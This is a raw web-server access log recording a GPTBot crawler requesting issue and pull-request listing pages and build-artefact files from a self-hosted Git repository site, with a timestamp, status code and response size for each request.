"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:19:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:19:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11224] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:19:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10142] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11208] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:19:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11603] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:19:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec?display=source" [Client 74.7.227.38] [Length 12514] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:19:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:19:45:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fxref-PostgresPatrol.html" [Client 74.7.227.38] [Length 19930] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:19:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?display=source" [Client 74.7.227.38] [Length 38275] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:19:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211009] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 